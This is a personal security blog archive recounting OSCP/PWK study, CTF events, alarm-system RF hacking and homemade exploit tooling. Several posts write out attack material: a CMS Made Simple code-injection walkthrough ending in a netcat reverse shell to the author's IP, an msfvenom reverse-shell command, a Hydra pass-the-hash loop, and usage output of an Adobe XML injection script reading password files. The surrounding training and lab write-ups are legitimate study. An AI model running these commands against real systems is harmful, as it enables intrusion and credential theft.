*: Remi Bergsma wrote an interesting article about Raspberry Pi clock accuracy, with and without RTC.


kilala.nl tags: , ,

View or add comments (curr. 0)

MacOS, Steam and legacy controllers

2017-06-27 06:39:00

Ten years ago, almost to the day, we bought a Playstation2 to play rhythm games like DDR and Guitar Hero. The console and its games have long since been relegated to storage, but one of the DualShock controllers is still with us in the living room. Our friend Baris once gifted us a LikSang SmartJoy Playstation2-to-USB converter, which I've been using in OpenEmu to play classic SNES games with my kid. 

In this month's Steam Summer Sale I grabbed two great games, "Ori" and "Hollow Knight", which play better using a controller. Unfortunately they don't recognize the SmartJoy out of the box, so I had to do some research. "JoystickMapper" to the rescue! It'll work with just about any controller and can be used to map buttons to keyboard actions, which most Mac and PC games support. Now I won't have to shell out bucks for a new controller! /o/ Well worth the five euros for JoystickMapper.


kilala.nl tags: ,

View or add comments (curr. 0)

Starting something new - SLAE: SecurityTube Linux Assembly Expert

2017-06-22 19:48:00

The ecstacy of achieving the OSCP certification didn't last long for me. Sure, I'm very happy and proud that I passed, but not two days later I was already yearning to move on! I wanted to get back to the PWK Labs, to finish the other thirty-odd servers. I wanted to retake the exam a second time. I wanted more challenge! So I set to making a list!

As something inbetween, I've signed up for SecurityTube's SLAE course: they teach you basic x86 assembly programming, to build and analyze Linux shellcode. Sounds very educational! And at only $150 for the course and exam it's a steal! I'll be blogging more about this in the future :)

Signing up for the course went easily and I got all the details within a day. However, actually getting the course files proved to be a struggle! There are three ZIP files, totalling roughly 7GB. They're stored in Amazon S3 buckets, which usually implies great delivery speeds. However, it seems that in this case SecurityTube have opted not to have any edge locations or POPs outside their basic US-WEST location. This means that I was sucking 7GB down a 14kbps straw :( That just won't do! Downloads were horribly slow!

After doublechecking that the issue did not lie with our home network, I attempted to download the files using my private server in the US: speeds were great. However, downloading from my own server wasn't much faster. Darn. Maybe there's another hickup? Two of my colleagues suggested using a VPN like PIA; sure that's an option. But I've been meaning to look into Amazon's AWS service, which allows you to quickly spin up virtual machines across the globe, so I went with that. 

I built a basic Ubuntu server in Frankfurt and downloaded the files from the US. Seeing how both the source and destination were on Amazon's network, that went perfectly fine. Grabbing the files from my Frankfurt system also went swimmingly. So after two days of bickering I finally have the course files on my laptop, ready to go :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

OSCP: more questions

2017-05-25 18:12:00

Here's another question I've had a few times, which came to me again this weekend:

"I'm really surprised you had the confidence to tackle the exam with just 19.

Is this you bread and butter ? Was this simply to formalize existing knowledge for you ?"

To be honest, I was just as surprised that I passed! No, I don't have workexperience in the field of pen-testing; I've only done two or three CTFs.

My original intention with my exam was to consider it a recon missions for my second exam. I was sure that 19 out of 55+ hosts was not enough to be prepared for the exam. I went into the exam fully reconciled with the idea that failing was not just an option, but all but assured. The exam would be a training mission, to learn what to expect. 

The day before my exam I had practiced exploiting a known buffer overflow in EasyRMtoMP3Converter (EXE). Here's the CoreLan writeup from 2009. Using the approach I learned during the PWK class and by studying various published exploits, I built my own Python script to exploit the software. After some additional work, the code worked against both Windows 7 and XP. 

This extra practice paid off, because I managed to finish the BOF part of the exam within two hours. This was basically the wind in my sails, what got me through the whole exam. After finishing the BOF I dared to hope that I might actually have a chance :) And I did. 


kilala.nl tags: , ,

View or add comments (curr. 0)

OSCP: Is the Pentesting With Kali (PWK) course worth it?

2017-05-23 14:07:00

One of my past colleagues reached out to me today, asking me this:

I'm still OSCP-wannaby, but probably it is too technical for me. I'm still not sure. Could you please share if a pre-exam training is worth its price or what is your practical - cutting of 'try harder' ;-) - advice to pass it?

I'll post my reply here, because I've been telling people this very thing for the past few weeks.

I've always thought OffSec's online PWK training to be well worth the money! $1150 gets you a huge PDF with all the course work, a few hours of videos and 90 days of lab access. It also includes your first exam attempt. For a training of this quality, that's really not a lot of money! You could even opt to pay even less, getting only 30/60 days of lab access.

The classroom variant is something else entirely though. It's a LOT more expensive, at roughly $6000. That's for a week's on-site training, including a CTF event on one night. You also get the same PDF and videos, the included exam, but only 30 days of lab access. For me, it was well worth it because it was five days of non-stop hacking in a room with 30 other students and two top-notch trainers.  

Something that saved me time and money: during the classroom training you receive the two most important VMs, which you can use on your OWN laptop. Thanks to that, I didn't have to start my lab access until I'd finished >90% of my exercises. In the online PWK you use lab access to work on your exercises!  

The course is always worth it before taking the exam: submitting a proper report of your coursework may net you 5 bonus points on the exam. Submitting a pen-test report for the labs may net you a further 5 bonus points. On a minimal passing score of 70, those 10 points can really help a lot!  

So yeah. Definitely work through all the coursework to get into it and score points. Then play a lot in the labs, for both practice and more points. Then take the exam when your time's up. Always do the exam! Because if you fail your exam and then renew your labs, OffSec will include a "free" retake of your exam with the new lab time! Totally worth it! That way your "failed" exam because a recon mission that teaches you a lot!


kilala.nl tags: , ,

View or add comments (curr. 0)

Hooray for Google's free projects

2017-05-11 21:04:00

A few weeks ago, I reopened commenting on this site after having it locked behind logins for years. Since then the amount of spam submissions have been growing steadily. Sucks, so I finally took the time to implement proper spam checking. Enter Google's free project reCaptcha. Of course I realize that, if something's free on the web, it probably means that I'm the product being sold. I'll have to poke around the code to see what it actually does :)

CodexWorld have a great tutorial on getting reCaptcha to work in a basic script. Took me less than an hour to get it all set up! Lovely!


kilala.nl tags: ,

View or add comments (curr. 3)

I love Microsoft's documentation!

2017-05-09 10:24:00

Four Windows servers on one laptop

A bit over a year ago I first started working with Microsoft's Active Directory, integrating it with BoKS Access Control. At the time, I was impressed by Windows Server 2012 and 2016 and the ease with which I could set up an AD forest with users. 

I'm now learning how to build a two-tier PKI infrastructure, after seeing them in action at various previous clients. I've been on the consuming end of PKI for years now and I thought it was time to really know how the other end works as well! I must say that I love Microsoft's generosity when it comes to documentation! Not only do they provide proper product docs, but they also have online tutorials in the form of TLGs: test lab guides. Using these, you can self-teach the basics of a subject, and then build up from there.

The 2012 Base TLG helps you build a basic AD forest of systems. I can follow it up with the two-tier PKI infrastructure TLG, which helps me set up an offline root CA, and an issuing CA, along with automatically enrolling any new systems in the networkt that need SSL certs. Awesome!

I'm similarly extatic about the performance of my Macbook Air. It's a tiny, super-portable system, but it still doesn't balk at running my usual applications plus four full-fledged Windows Server 2012 hosts. Nice!

EDIT:

Ammar Hasayen also did a nice write-up, which appears to be based upon the two-tier PKI TLG but which adds additional details.

Also, Microsoft also offer a third great resource, their MVA: Microsoft Virtual Academy. They also have a course on two-tier PKI with ADCS


kilala.nl tags: , ,

View or add comments (curr. 0)

Learning Powershell? Mind your flags!

2017-05-09 08:54:00

I can't believe such a small, silly thing had me going for ten minutes!

When trying to retrieve a signed certificate from my ADCS rootCA, I kept getting a "file not found" error:

> certreq retrieve 2 .subCA.corp.contoso.com_subCA.crt
: The system cannot find the file specified. 0x80070002 (WIN32: 2)

Googling didn't lead to many results, but then I realized: Windows commands need to discern between variables and values, just like any OS. Doh! Forgot the minus!

>  certreq -retrieve 2 .subCA.corp.contoso.com_subCA.crt

Works just fine! 


kilala.nl tags: , ,

View or add comments (curr. 0)

PWK and OSCP: pointers and advise

2017-05-07 14:38:00

It's traditional to do a huge writeup after finishing the OSCP certification, but I'm not going to. People such as Dan Helton and Mike Czumak have done great jobs outlining the whole process of the course, the exercises, the labs and the exam. So I suggest you go and read their reviews. :)

In the mean time, here are the few things I would suggest to anyone undertaking PWK+OSCP. 

The day after finishing the exam was one of elation: I couldn't be more happier. But not a day later, I'm already missing the grueling work! I want to go back to the labs, to finish the remaining 30+ servers I hadn't cracked yet. I even want to retake the exam, to get more challenges! 

For now, my plan is as follows:

  1. First, I'm going to study to upgrade my RHCSA and RHCE to RHEL7.
  2. When I'm between assignments again, I will invest in more PWK labtime to practice with more target hosts. 
  3. Once I have finished the labs I will continue my journey with OffSec's CTP (Cracking The Perimeter) course and the OCSE exam. 

Back in college, René was right: "That guy just doesn't know the meaning of the word 'relaxation'."


kilala.nl tags: , ,

View or add comments (curr. 2)

OSCP exam: done and dusted

2017-05-03 15:34:00

Sorry for posting in Dutch :) This is an ad verbatim quote from a forum post I made today; just a braindump of how my past day went. 


Wie is er gaar? Ik is er gaar! /o/

Ik heb m'n OSCP examen achter de rug! Dat ging eigenlijk een heel stuk beter dan verwacht :D

Het liefste was ik gisteren rond 0700-0800 begonnen, maar het vroegste timeslot dat ze je bieden is vanaf 1100. Ik had dus van 1100 gisteren tot zo'n 4 uur geleden de tijd voor het aanvallen van mijn doelwitten. Daar naast had ik van 1100 vanochtend tot morgen 1100 de tijd om mijn testrapport op te stellen en in te leveren. NOU! Het is een hele slag geweest, maar het zit er op. Ik ben uiteindelijk zo'n 21 uur in touw geweest.

M'n taktiek was om op de achtergrond een berg scans af te trappen, zodat ik me bezig kon houden met de bak waar geen scan voor nodig was: de buffer overflow oefening. Rond middernacht had ik in principe genoeg punten binnen om te slagen, dus bedtijd!

Maar helaasch :D Ik kon door de adrenaline de slaap niet vatten! Om 0200 er weer uit gegaan en verder gegaan. Rond 0300 ging ik m'n eindrapport vast opstellen. Om half zeven was die zo'n beetje klaar! Ik heb nog wat tijd gestoken in die laatste privesc, maar niets meer gevonden. Ik was om half negen zo gaar, dat ik't best vond! Ik heb al m'n documentatie verzameld, nog één keer alles goed nagekeken en ingezonden. 

Douchen en instorten! Geslapen tot een uur of elf en voel me nu al een stuk beter! :)

Ik had helemaal niet verwacht dat ik zo ver zou komen! Tussen alle verhalen op de OffSec forums, van mensen die helemaal dichtslaan en mijn eigen ervaringen uit het verleden, had ik niet verwacht meer dan één bak te kraken. Maar met wat ik heb bereikt heb ik an sich al genoeg punten om te slagen en ik hoop natuurlijk ook op de 5+5 bonuspunten voor de lab rapporten die ik indien. 

De ontvangstbevestiging van OffSec is in elk geval binnen. Nu begint het wachten!


kilala.nl tags: ,

View or add comments (curr. 0)

OSCP exam: almost done

2017-05-03 06:41:00

4.5 hours left on the clock and I have four hosts fully rooted, the fifth I have a lowpriv shell. With the last one I decided to fsck-it and use the MSF Exploit, to save time :) I could've done it manually, but that would've cost me dear time. 

I didn't get any sleep because I was so strung out on adrenaline :D So after going to bed at 0015, I got up again at 0200. Got my foot in the door with the fifth host, then started writing my final report. Preparation and proper note taking works! In roughly 3.5 hours I have my report fully typed up! 

I can now investigate that last privesc at a leisurely pace :)


kilala.nl tags: ,

View or add comments (curr. 1)

Lab time's up! Only a few days left

2017-04-27 22:19:00

This morning my lab time for the PWK studies expired. I tied a ribbon around the lab report and I'm done! In just a week's time the lab penetration test report grew from 67 pages to 101! In total, I've cracked 18 of the 50+ servers and I'd made good progress on number 19. Not even halfway through the labs, but heck! I've learned SO much! I'm looking forward to Tuesday, even knowing up front that I will not pass. It's gonna be such a great experience! /o/

kilala.nl tags: , ,

View or add comments (curr. 0)

Why even study for OSCP if I can play Hacknet?!

2017-04-19 16:21:00

Way back in the nineties, my brother played Uplink pretty extensively. It was a great game for the time :) Now there's a new, indie hacking game called Hacknet! Seems like a worthy successor!

Ahh yes, running "Scan", "Porthack" and "SSHCrack 22" should suffice in any pen-testing situation! :)


kilala.nl tags: ,

View or add comments (curr. 0)

Almost ready for my first OSCP exam

2017-04-19 14:40:00

Covers of my reports

I sincerely doubt that I'm ready to pass the OSCP exam, but my first attempt is scheduled for May 2nd. My lab time's coming to a close in little over a week and so far I have fully exploited twelve systems and I've learned a tremendous amount of new things. It's been a wonderful experience!

In preparation for the exam, I have finally completed two reports for bonus points:

I've done my best to make the reports fit to my usual standards of documentation, so I'm pretty darn proud of the results! 

Let's see how things go in a week or two. I'll learn a lot during my first exam and after that I'll probably book more lab time. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

I've written my first exploit tool: XML injection in Adobe services leads to file disclosure

2017-04-07 21:35:00

Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".

I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper). 

I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh

I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs. 

EDIT: And it's up on Exploit-DB!

Here's a little show of what the script does!


root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -?

        adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file]

	   -?   Show this help message.
	   -d   Debug mode, outputs more kruft on stdout.
	   -s   Use SSL / HTTPS, instead of HTTP.
	   -b	Break on the first valid answer found.
	   -h	Target host
	   -p	Target port, defaults to 8400.
	   -f	Full path to file to grab, defaults to /etc/passwd.

	This script exploits a known vulnerability in a set of Adobe applications. Using one 
	of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
	normally inaccessible. 

	NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example:
	adobe_xml_inject.sh -h 192.168.1.20 -f c:\\coldfusion8\\lib\\password.properties
	adobe_xml_inject.sh -h 192.168.1.20 -f 'c:\coldfusion8\lib\password.properties'

	This script relies on CURL, so please have it in your PATH. 


root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h 192.168.10.23 -p 80 -f 'c:\coldfusion8\lib\password.properties'
INFO 200 for http://192.168.10.23:80/flex2gateway/
INFO 200 for http://192.168.10.23:80/flex2gateway/http
Read from http://192.168.10.23:80/flex2gateway/http:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header>
<body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits>
<string>timestamp</string><string>headers</string><string>body</string>
<string>correlationId</string><string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string></traits>
<double>1.491574892476E12</double><object><traits><string>DSId</string>
</traits><string>DCB6C381-FC19-7475-FC8F-9620278E2A14</string></object><null/>
<string>#Fri Sep 23 18:27:15 PDT 2011
rdspassword=< redacted >
password=< redacted >
encrypted=true
</string><string>DCB6C381-FC3E-1604-E33B-88C663AAA33F</string>
<double>0.0</double><string>DCB6C381-FC2E-68D8-986E-BD28CQEDABD7</string>
<null/></object></body></amfx>"200"
INFO 500 for http://192.168.10.23:80/flex2gateway/httpsecure
INFO 200 for http://192.168.10.23:80/flex2gateway/cfamfpolling
INFO 500 for http://192.168.10.23:80/flex2gateway/amf
INFO 500 for http://192.168.10.23:80/flex2gateway/amfpolling
INFO 404 for http://192.168.10.23:80/messagebroker/http
INFO 404 for http://192.168.10.23:80/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/http
INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/samples/messagebroker/http
INFO 404 for http://192.168.10.23:80/samples/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/lcds/messagebroker/http
INFO 404 for http://192.168.10.23:80/lcds/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/http
INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/httpsecure

kilala.nl tags: , , ,

View or add comments (curr. 0)

A wonderful day at CTF036 2017

2017-03-31 22:40:00

Presenting at CTF036 about RF hacking

Today was a blast! In what has become an annual tradition, Ultimum organised the third edition of their CTF036 event

A big change since last year: I started the day not by listening, but by talking! I presented the "My first RH hack" talk, which I'd given last year at IT Gilde. In it, I outlined what I'd learned hacking the Kerui alarm system. The slides to my presentation can be found here. Reactions from the attendants were generally positive: apparently my presentation style was well-received and I'd matched the content's level to that of the crowd. 

I was followed by John Kroon, who detailed a vulnerability assessment framework he'd built and Sijmen Ruwhof. The latter has recently gained some fame with his public outcry regarding the Dutch voting process and the software involved. It's quite the kerfuffle!

The CTF was quite a challenge! Like last year we were presented with an A4 sized description of the target, which basically hinted at a domainname, a mail server and a DNS server. After some initial confusion about IP ranges, I got off to a start. DNSenum confirmed three hosts in one network, with two others in a deeper subnet. The three servers out in the open are respectively a web server, the mail server and a Windows host with data shares. 

Like last year, I started with the web server. This runs CMS-Made-Simple v1.1.2. Sploitsearch did not list anything that seemed immediately useful, but Nikto did show me that various useful subdirs were found, including /admin and /install. John's colleague Jordy quickly found something interesting, which relies upon /install not being deleted: CMS-MS PHP Code Injection vulnerability

By this time a few competitors had discovered something I'd missed: the Windows box had a freely accessible share with three of the sought-after accounts, worth 30 points. Of the twenty-odd competitors, three had 30 points within the first hour. 

John and I continued poking at Jordy's suggestion, with Rik across the tables following suit. I was the first to get it to work, after Jordy spurred me on. The basic process was indeed as outlined in the linked article:

  1. Setup MySQL on my own sytem.
  2. Make a random, empty database and grant a new account (e.g. "test") full access to the database. 
  3. The password to the user account must be: '.passthru($_GET['command']);exit;//
  4. The database must be accessible remotely (change mysql.cnf and use the appropriate GRANT, more info here).
  5. At this point you use the setup tool in /install to point CMS-MS at your own database. Uncheck the boxes in step #4. 
  6. Once you've finished the setup tool, the config.php file contains the password above, which enables you to call the base URL with an added "?command=" where you can enter any arbitrary command for the host OS. 
  7. I quickly found that the target host had /bin/netcat installed, so I could run http://www.thesmartcloud.nl/?command=/bin/netcat -e /bin/bash 172.100.23.74 443
  8. This connects to my listening netcat on my port 443. Ace!

Netcat gave me a shell as user "www-data". Poking around the host I found no abusable SUID executables, no sudo rules and no obvious methods for privesc. I did manage to grab /home/accounts.txt which contains seven accounts. Thus, for about half an hour, I was in the gleeful position of being 1st with 70 points :D 

While I kept poking at the web server and later moved on to the RoundCube/Dovecot box, I also helped John and Rik while they tried to get the CMS-MS exploit to work. Word got around quickly and a few of the guys who already had 30pts moved up to 100, with about 40mins left. I tried hard, but I couldn't find a way to score more points, so I ended up in 5th place today. 

Ultimum's Michael informed us that the maximum score attainable was 500pts, so basically none of us had scratched beyond the surface by 16:00. As I said: they made it quite the challenge! It was a lot of fun!


kilala.nl tags: , ,

View or add comments (curr. 0)

More attention for bad security of home alarms

2017-03-31 19:49:00

Cover of the April CT magazine

You may recall my pen-test / security review of the Kerui alarm system, where I found that a replay attack is tremendously easy

Turns out that more people are catching on! One of the audience members at my presentation today informed me that the April issue of C'T Magazine has a cover story about this exact topic: unsafe home alarm systems. Awesome! Can't wait to read it!


kilala.nl tags: ,

View or add comments (curr. 0)

Linux in the way-way back machine!

2017-03-27 09:01:00

InfoMagic Linux box from the nineties

RedHat just posted a wonderful article to LinkedIn, that filled me with nostalgia: Test-drive Linux from 1993-2001.

My first experience with Linux was at the Hogeschool Utrecht, in Jaap's class on modern-day operating systems and networks. I've long forgotten his surname, but Jaap was always very enthusiastic about Linux and about what open source might mean for our future. In the labs, we set up Linux boxen and hooked up modems so we could make our own dial-in lines to school. None of us really knew what we were doing, just dicking around and learning as we went. It was a great experience! :)

I wanted to keep on working with Linux outside of our labs, so I hopped down to *) in Utrecht. I've forgotten what they were called at the time... Was it Donner? I dunno, we always called them "sterretje-hekje" (star-brace) for their logo. They were the largest bookstore in the center of Utrecht, and their basement was dedicated to academics. Among their endless stacks of IT books I found my treasured New Hackers Dictionary (the Jargon file) and the famed InfoMagic Linux Developer's Resource CD-ROM boxset (pictured left). 

Trying the various CDs, I settled on RedHat 5.0 which ran pretty nicely on my Compaq Pressario AIO. Mmmm, 450MB hard drive, 4x CD-ROM and 16MB of RAM! ;) 

Right before graduating from HU, one of the lab technicians gifted me a Televideo 950 dumb terminal. We'd used those in the OS-9 labs, while we learned assembly on the MC68000. I don't recall what hardware we used there... It was two students to a nondescript aluminum box, wired through token ring to a bright orange OS-9 server. I still wonder what server was!

Wow... Hard to believe it's already been eighteen years!


kilala.nl tags: , ,

View or add comments (curr. 2)

CISSP certs now come with a spiffy giftbox

2017-03-01 17:10:00

When I renewed my CISSP status a few weeks ago, I knew I'd be getting a new membership card in the mail. What I didn't expect however, was to get a swanky giftbox with a nice presentation of the cert, card and a pin! Looking classy there, ISC2 :)


kilala.nl tags: ,

View or add comments (curr. 0)

Quick connection checks in Bash

2017-02-24 16:27:00

I can't believe it took me at least four years to learn about Bash's built-in Netcat equivalent /dev/tcp. And I really can't believe it took me even longer than that to learn about Bash's timeout command!

Today I'm attempting pass-the-hash attacks on the SMB hosts in the PWK labs. After trying a few different approaches, I've settled on using Hydra to test the hashes. The downside is that Hydra can sometimes get stuck in these "child terminated, cannot connect" loops when the SMB target can't be reached. To prevent that, I'm testing the connection with Bash's /dev/tcp, which has the downside that it may also get stuck in long waiting periods if the target isn't responding correctly. Enter timeout, stage left!

for IP in $(cat smb-hosts.txt | cut -f2)
do 
	timeout 10 bash -c "echo > /dev/tcp/${IP}/445"
	[[ $? -gt 0 ]] && continue

	cat hashdump2.txt | tr ':' ' ' | while read USER IDNUM HSH1 HSH2
	do 
	  echo "============================"
	  echo "Testing ${USER} at ${IP}"
	  hydra -l ${USER} -p ${HSH1}:${HSH2} ${IP} -m "LocalHash" smb -w 5 -t 1
	done
done

kilala.nl tags: , ,

View or add comments (curr. 0)

Learning more about and thanks to buffer overflows

2017-02-04 09:20:00

I'm very happy that the PWK coursebook includes no less than three prepared buffer overflow exercises to play with. The first literally takes you by the hand and leads you through building the buffer overflow attack step by step. The second (exercise 7.8.1) gives you a Windows daemon to attack and basically tells you "Right! Now do what you just did once more, but without help!" and the third falls kind of in-between while attacking a Linux daemon. Exercise 7.8.1 (vulnserver.exe) is the last one I tackled as it required lab access.

By this time I felt I had an okay grasp of the basics and I had quickly ascertained the limits within which I would have to complete my work. Things ended up taking a lot more time though, because I have a shaky understanding of the output sizing displayed by MSFVenom. For example:

root@kali:# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.177 LPORT=443 -b "\x00" -f c
...
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes

I kept looking at the "final size" line, expecting that to be the amount that I needed to pack away inside the buffer. That led me down a rabbit hole of searching for the smallest possible payload (e.g. "cmd/windows/adduser") and trying to use that. Turns out that I should not look at the "final size" line, but simply at the "payload size" value. Man, 7.8.1 is so much easier now! Because yes, just about any decent payload does fit inside the buffer part before the EIP value. 

That just leaves you with the task of grabbing a pointer towards the start of the buffer. ESP is often used, but at the point of the exploit it points towards the end of the buffer. Not a problem though, right? Just throw a little math at it! Using "nasm_shell" I found the biggest subtraction (hint: it's not 1000 like in the image) I could make without introducing NULL characters into the buffer and just combined a bunch of'm to throw ESP backwards. After that, things work just fine. 

Learning points that I should look into:


kilala.nl tags: , , ,

View or add comments (curr. 0)

PWK Labs lead times? Not today!

2017-01-27 12:28:00

Having finished 90% of my PWK exercises, it's time to get into the online labs! The final 10% of the exercises need lab access and I need a Windows VM with valid SLMail license. The OffSec website warns that usually there's a two to three week lead time on your lab access requests. Well apparently not today! I received an email at 12:27 that my lab access will start at 13:30 today. Ace!


kilala.nl tags: , ,

View or add comments (curr. 0)

OSCP and PWK studies: progress

2017-01-24 21:16:00

It's been a few weeks since I took the PWK (Pentesting With Kali Linux) course at TSTC in Veenendaal. After a short break, I've gone over the whole course book a second time. On the one hand to keep the materials fresh in my head, but also to go over all of the exercises a second time. By making a proper report of all the exercises, it's possible to qualify for 5 bonus points on the OSCP exam. On a minimum score of 70 points, that's a pretty big deal!

I'm currently busting my head on chapter 8, on Linux buffer overflows, which wasn't handled in class. I'm fine on the general concepts and execution, but I'm running afoul a conflict between the 64-bit EDB debugger and the 32-bit application used as an example. Things aren't playing 100% nice, with an unexpected segfault currently getting in my way. 

After this, it's time to start my lab time. I've finished all the coursework as far as possible without using the labs, but now that can't be postponed anymore. 


kilala.nl tags: ,

View or add comments (curr. 0)

Getting with the times: website renovation

2017-01-19 22:18:00

It's been roughly eight years since I started work on KilalaCMS, the code that runs this website. She's served me well and I haven't had many headaches. Early on, Dick offered me lots of great help in sanitizing input, putting up at least some SQL injection protection. In the end it might not be much to look at, but she's mine :)

A few months back Dreamhost sent their customers who were still on PHP5.5 a warning that said version would soon be dropped from their servers. Thus, it was a warning to go check your code. Obviously KilalaCMS was behind the times, so I've now taken some time to adjust things here and there so it works in PHP7.0. I've also taken the liberty to default everything to HTTPS, using a free SSL cert from Lets Encrypt. Dreamhost took care of the latter part for me. Good service!

I may run into a bug or two, but so far things are looking good!

EDIT: Kudos by the way to Dreamhost for their tech support! As part of the reno, I'd decided to run an "sqlmap" test against my DEV site, to make sure I wasn't leaving SQLI in plain sight. After the first tentative probe, the server slammed the door on my nose! They've got their boxes set up quite nicely, to prevent attacks like these. Nice! Had a chat with their support people and we worked out a nice way for me to test, without affecting my site or any of the other folks hosted on my box. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Offensive Security PWK - CTF

2016-12-16 12:37:00

Faraday Security pentest

So far I'm loving OffSec's live classroom PWK course (Pen-Testing with Kali Linux), mostly because it actually requires quite some effort while your there. No slouching in your seats, but axe-to-the-grindwheel hands-on work. But last night was a toughy! As part of the five day course, the Thursday evening offers an additional CTF where all students can take part in attacking a simulated company. 

The initial setup is quite similar to the events which I'd experience at Ultimum and at KPMG: the contestants were divided into teams and were given VPN login details. In this case, the VPN connection led us straight into the target company's DMZ, of which we were given a basic sketch. A handful of servers were shown, as well as a number of routers/firewalls leading into SCADA and backoffice networks. As usual, the challenge was to own as many systems as possible and to delve as deeply into the network as you could. 

Let me tell you, practicing coursework is something completely different from trying the real deal. Here we are, with 32 hours of practice under our belt and all of a sudden we're spoilt for choice. Two dozen target hosts with all manner of OSes and software. In the end my team concluded that it was so much that it'd left our heads spinning and that we should have focused on a small number of targets instead of going wide. 

Our initial approach was very nice: get together as a group, quickly introduce eachother and then form pairs. With a team of 8-10 people, working individually leads to a huge mess. Working in pairs, not only would we have two brains on one problem, but that would also leave more room for open communication. We spent the first 45 minutes on getting our VPN connections working and on recon, each pair using a different strategy. All results were the poured into Faraday on my laptop, whose dashboard was accessible to our team mates through the browser. I've been using Faraday pretty extensively during the PWK course and I'm seriously considering using it on future assignments!

After three grueling hours our team came in second, having owned only one box and having scored minor flags on other hosts. I'm grateful that the OffSec team went over a few of the targets today, taking about 30min each to discuss the approach needed to tackle each host. Very educational and the approaches were all across the board :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Continued RF hacking of a home alarm system

2016-10-21 10:57:00

Continuing where I left off last time (replay attack using a remote), I wanted to see how easy it would be to mess with the sensors attached to the Kerui home alarm system that I'm assessing. 

For starters, I assumed that each sensor would use the same HS1527 with a different set of data sent for various states. At least in the case of the magnet sensors, that assumption was correct. The bitstreams generated by one of the contacts are as follows:

As I proved last time, replaying any of these codes is trivial using an Arduino or similar equipment. Possible use cases for miscreants could include:

  1. Trick the alarm into thinking an open door is closed, before the alarm gets armed. That way the home owner does not get alerted about leaving something open when leaving the home. 
  2. Trick the alarm into thinking a window opened, after the alarm gets armed. Do this often enough, a few nights a week, and the home owner will get fed up with the alarm and just disable it. 

Going one step further I was wondering whether the simple 433Mhz transmitter for my Arduino would be capable of drowning out the professionally made magnet contacts. By using Suat Özgür's RC-Switch library again, I set the transmitter to continuously transmit a stream of ones. Basically, just shouting "AAAAAAAAAHHHHH!!!!!" down the 433MHz band.

Works like a charm, as you can see in the video below. Without the transmitter going, the panel hears the magnet contact just fine. Turning on the transmitter drowns out any of the signals sent by the contact.


kilala.nl tags: , ,

View or add comments (curr. 0)

First steps in hardware hacking

2016-10-05 08:23:00

Having come a long way in the RF-part of my current security project, I decided to dive into the hardware part of my research. The past few weeks have been spent with a loupe, my trusty multimeter, a soldering iron and some interesting hardware!

Cracking the shell of the Kerui G19 shows a pretty nice PCB! All ICs and components are on the backside, the front being dedicated to the buttons and the business end of the LCD panel. Opening the lid on the back immediately shows what look like unterminated service pins (two sets of'm), which is promising. 

What's less promising, is that the main IC is completely unmarked. That makes identifying the processor very hard, until I can take a crack at the actual firmware. My initial guess was that it's some ARM7 derivative, because the central panel mostly acts like a dressed-down feature phone with Android. A few weeks later that guess feels very, very off and it's most likely something much simpler. As user PedroDaGr8 mentioned on my Reddit thread about the PCB:

"Most people would assume an ARM in this case. In reality, it might be ARM, PIC, AVR, MIPS, FPGA, CPLD, H78, etc. Any of these could fulfill this role and function. It often depends on what the programmer or programming team is familiar with. I have seen some designs from China before, that used a WAY OVERKILL Analog Devices Blackfin DSP processor as the core. Why? Because it was cheaper to use the guys they had that were proficient at programming in Blackfin than to hire new guys for this one product."

So until I can analyse the firmware, the CPU could be just about anything! :D

There are many great guides online, on the basics of hardware hacking, like DevTTYs0's "Reverse engineering serial ports" or Black Hills Security's "We can hardware hack, and you can too!". Feeling confident in their teachings I took to those service pins with my multimeter. Sadly, both rows of pins had an amount of pins that's not consistent with UART consoles but I didn't let that discourage me. Based on the measured voltages I hooked up my PL2303 UART-to-USB, to see if I could find anything useful. 

No dice. Multiple pins provided output onto my Picocom console, often with interspersed Chinese unicode characters. But no pins would react to input and the output didn't look anything like a running OS or logging. 

Between the lack of identification on the CPU and the lack of clear UART ports, it was time for hard work! I took a page from the book of Joffrey Czarny & Raphaël Rigo ("Reverse engineering hardware for software reversers", slide 11) and started mapping out all the components and traces on the PCB. Instead of using their "hobo method" with GIMP, I one-upped things by using the vector editor InkScape. My first few hours of work resulted in what you see above: a mapping of both sides of the PCB and the interconnections of most of the pins. 

Thus I learned a few things:

  1. Damn! There's at least one hidden layer of traces on the inside of the PCB. I have deduced the existence of a number of connections that cannot be visually confirmed, only by measuring resistance. 
  2. The service headers under the backside lid are connected to both the CPU (CN11 and CN3) with CN3 probably having served to flash the firmware into the EN25-F80 EEPROM.

Status for now: lots of rewarding work and I have a great SVG to show for it. And I've gotten to know my Arduino and PL2303 a bit better. But I haven't found anything that helps me identify an OS or a console port yet. I'll keep at it!!


kilala.nl tags: , ,

View or add comments (curr. 2)

First steps in RF hacking

2016-09-20 18:05:00

